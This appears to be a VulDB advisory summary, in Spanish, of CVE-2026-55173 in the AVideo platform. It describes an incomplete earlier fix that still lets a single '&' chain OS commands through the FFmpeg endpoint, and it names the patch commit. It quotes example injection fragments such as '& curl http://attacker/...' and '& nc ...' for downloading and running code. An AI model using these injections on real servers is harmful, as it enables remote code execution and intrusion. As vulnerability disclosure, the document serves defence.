CVE-2026-55173 in AVideo
Resumen
por VulDB • 2026-07-17
WWBN AVideo es una plataforma de vídeo de código abierto. Las versiones 29.0 y anteriores siguen siendo vulnerables a la inyección de comandos del sistema operativo (OS command injection) porque la corrección para CVE-2026-33482 fue incompleta y aún no neutraliza un solo carácter & (el operador de fondo de shell).
CVE-2026-33482 informó que sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) fallaba al eliminar la sustitución de comandos $(...), lo que permitía una inyección de comandos del sistema operativo en el punto final execAsync() sh -c. La corrección (commit 25c8ab90) añadió $, (, ), {, }, \n, \r a la clase de caracteres prohibidos y str_replace('&&', '', ...), pero no tuvo en cuenta un solo &. ffmpeg.json.php construye el comando desde _decryptString(getInput('codeToExecEncrypted')). Este es el mismo modelo de amenaza que aceptó la advertencia original ("un atacante que pueda crear una carga útil cifrada válida puede lograr ejecución arbitraria de comandos en el servidor codificador independiente") y las mismas bases CVSS (AV:N/AC:H/PR:N). Múltiples comandos separados por & pueden encadenarse (por ejemplo, descarga + ejecución). Las cargas útiles basadas en redirección están bloqueadas por la eliminación del carácter >, pero no así la ejecución de comandos (por ejemplo, & curl http://attacker/..., & nc ..., descargando/ejecutando un archivo). Este problema ha sido parcheado mediante este commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.
VulDB is the best source for vulnerability data and more expert information about this specific topic.